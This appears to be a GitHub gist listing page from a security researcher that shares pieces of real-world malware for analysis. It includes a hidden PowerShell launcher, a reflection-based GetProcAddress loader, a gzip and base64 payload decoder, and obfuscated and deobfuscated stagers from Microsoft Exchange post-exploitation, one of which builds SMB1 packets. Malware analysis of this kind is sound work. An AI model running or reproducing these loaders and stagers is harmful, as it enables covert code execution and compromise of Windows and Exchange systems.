Skip to content

Instantly share code, notes, and snippets.

View JohnHammond's full-sized avatar

John Hammond JohnHammond

10.5k followers · 13 following
View GitHub Profile
@JohnHammond
JohnHammond / powershell_other_stage.ps1
Created May 3, 2021 23:09
function sOH {
Param ($o73, $icO)
$zJ3 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $zJ3.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($zJ3.GetMethod('GetModuleHandle')).Invoke($null, @($o73)))), $icO))
}
function b9MW {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $feiNr,
@JohnHammond
JohnHammond / base64_blob.txt
Last active January 6, 2023 19:40
H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9YKwwBTj4HC4Jh0+9/3jg1p
qqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaMjWK49GhfcB05YKEnSiTcO
jpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVcOKcWKtuOGiDtTIo/t9WPX
YaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeMs9ml9iqOL8/o4yhwfDcDa
FpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen2Lo8o3qC6HlGUxomN0i12
UVbvOZFH0B3yl6Bl0xRHwVIUQWwbr5FQi3JCJO53zAgD9FCB9qtKwnMlkBrSVJSgii/TNGMvJ+igyL8S
Jyu8CE9ZfIDt28nxybFf8WR1ZU6fEwVGR4v9GEFswjDO8F7uAydLnAluHBqnBUxrozRH4vIJWa7mIzxI
pZ8baFbSIBs/3K/nsLaYxNhbgk5Zz1roPIxabOPnxOwgH0eoU0TOBrsV94TXYEY+Qfs065XYAMIS+HID
eR1EUOBQhhyr9gu17gbTJ101x8RDqeJCqTKICqoo/hjMoRgCr0cm2gBMhznQr+YD41ElXbK8qLyzOQjx
beJkmcQNczhyrsTZyCHIkzglynC5peQ03g/57+GaOaHYdTJamVuKT0CWDttxlNE0d6F0kPzITpCLHcKw
@JohnHammond
JohnHammond / powershell_quiet.ps1
Created May 3, 2021 23:08
$s.UseShellExecute=$false;
$s.RedirectStandardOutput=$true;
$s.WindowStyle='Hidden';
$s.CreateNoWindow=$true;
@JohnHammond
JohnHammond / powershell_data.ps1
Created May 3, 2021 23:08
&([scriptblock]::create((
New-Object IO.StreamReader(
New-Object IO.Compression.GzipStream((
New-Object IO.MemoryStream(,
[Convert]::FromBase64String(
''...BASE64GZIPDATA...''
))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
@JohnHammond
JohnHammond / powershell_process_starter.ps1
Created May 3, 2021 23:07
$s = New-Object System.Diagnostics.ProcessStartInfo;
$s.FileName = $b;
$s.Arguments='-noni -nop -w hidden -c
@JohnHammond
JohnHammond / powershell_architecture_check.ps1
Created May 3, 2021 23:06
if ([IntPtr]::Size -eq 4) {
$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'
}else{
$b='powershell.exe'
};
@JohnHammond
JohnHammond / initial_foothold.bat
Last active January 6, 2023 19:40
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -noni -c if([IntPtr]
::Size -eq 4){=:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{=
'powershell.exe'};=New-Object System.Diagnostics.ProcessStartInfo;.FileName=;.Ar
guments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamRe
ader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]
::FromBase64String(''H4sIAAb/EF0CA7VWa2+bSBT9nEj5D6iyBCjExombNpEqLdgmhhrHBD9iu9Y
KwwBTj4HC4Jh0+9/3jg1pqqS77UqLbDGP+zz3zFz8PHIpjiMuu+1xX0+Oj4ZO6mw4oRa/u5C4GnZvxaM
jWK49GhfcB05YKEnSiTcOjpbX1+08TVFED/P6DaJKlqHNimCUCSL3FzcNUYrOblefkUu5r1ztz/oNiVc
OKcWKtuOGiDtTIo/t9WPXYaHU7YRgKvCfPvHi4qy5rHe/5A7JBN4uMoo2dY8QXuS+iczhqEiQwJvYTeM
s9ml9iqOL8/o4yhwfDcDaFpmIhrGX8SIkAb8U0TyNOJYO0z/sCjwMh2nsKp6XoizjJW7BLC+Wyz+ERen
@JohnHammond
JohnHammond / stage5_deobfuscated_188.166.162.201_update.png.ps1
Created March 6, 2021 07:03
Microsoft Exchange Post-Exploitation Artifacts stage #5
This file has been truncated, but you can view the full file.
function make_smb1_anonymous_login_packet {
[Byte[]] $pkt = [Byte[]] (0x00)
$pkt += 0x00,0x00,0x48
$pkt += 0xff,0x53,0x4D,0x42
$pkt += 0x73
$pkt += 0x00,0x00,0x00,0x00
$pkt += 0x18
$pkt += 0x01,0x48
$pkt += 0x00,0x00
$pkt += 0x00,0x00,0x00,0x00
@JohnHammond
JohnHammond / 188.166.162.201_update_stager.ps1
Created March 6, 2021 05:49
Microsoft Exchange Post-Exploitation Stager 04
This file has been truncated, but you can view the full file.
((("{2070}{2069}{563}{1918}{1769}{1682}{51}{1258}{1854}{1127}{1374}{1599}{1168}{2427}{2098}{1823}{2257}{2997}{452}{1256}{1131}{155}{2084}{2946}{329}{1855}{1104}{1390}{1332}{1988}{202}{1781}{893}{2363}{2718}{818}{1334}{1965}{2542}{1164}{815}{772}{2274}{1214}{840}{2930}{2375}{384}{157}{2030}{2906}{2349}{2814}{1251}{2462}{1955}{3018}{687}{1636}{2950}{640}{1724}{2966}{2903}{992}{2636}{773}{1858}{2743}{1340}{561}{365}{521}{2341}{72}{442}{951}{944}{2160}{473}{2521}{806}{1311}{2348}{2126}{923}{2014}{2687}{2933}{845}{867}{742}{423}{2627}{624}{2144}{874}{2410}{330}{1267}{2233}{616}{713}{1878}{1562}{2617}{1917}{575}{841}{2109}{1109}{2161}{1587}{1272}{538}{2880}{532}{727}{886}{200}{737}{1150}{1972}{2001}{603}{2866}{2988}{963}{1830}{1441}{2618}{11}{753}{1021}{1305}{2021}{243}{2479}{919}{2548}{2059}{1569}{1968}{958}{2782}{1762}{2208}{2206}{2215}{814}{1748}{310}{1662}{299}{690}{1230}{1704}{1770}{1426}{1749}{2663}{1111}{1804}{2450}{2529}{2555}{1564}{735}{3006}{1579}{2776}{1120}{2853}{1399}{1210}{2220}{2231}{1186}{2262}{189
@JohnHammond
JohnHammond / 188.166.162.201_update.png.ps1
Created March 6, 2021 05:47
Microsoft Exchange Post-Exploitation Stager 03
This file has been truncated, but you can view the full file.
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8i0q2trY9+8d7Og51fQv9++vCX/OL7n977Jb949+HuAf37AB/sfnqwRx/v0m979/Hpwf19+nd37wH9e+8Bfr//EO2oIQHZx+d7Ow+55R7B2tu7j08ePqR/9+/vMZhP0fweQN6/j9YH+2ixTx/f2wOoA3y8u7sD4Pce7uDfe3jz4QG62MGvDw7o9YOH6OAeUN57AJQPGO979/Diw08B+/4+Wu9+uo8v6YMHD/aAE+O9t4tP9zH2h/fw770H1OLeAY+Jh8GfPtz5FN/tE2Z7B7v8Isixt/8p4wRc7+2g408PQJNP76H5w/v06qeAvftgj4f3KX+8Q7g+fAgcuN2DByD3AQhLOOH3e3jn/qfUwT0M4P7eLndO/wLzfQznIbp/uA+ou59S630A2eOWB8CVSCsvAeruHn3ykGdiB8jvMZY04HsYO/Vw8Cn9/QBw97nVp5jBTxnnXfRxAFrt7e9SR/dADwIIAHsA8OkuxrDLY3gA0t//lIe2C0I8xL/3QdIDoL+3u8Nsgn8Jb559JtgeBnb/HpA9OMDgMdcPgMXBAWi2Q589uIeWuyDq7kOewp0dgvApyLl3IKQFczxk9j1gPPe510+ZJUC++/hqB1TavbfDfMe0BdX39h8QVg93gdp9JtvOfSB7nyXgITj7ocwRhIEEg5lo54D/Red74C1hjgd4/x7Itfspt4N0fMpcvMd4PWC+fgCZ293H7NAr6PhTxn0XuO4e7DDRMV6aWEa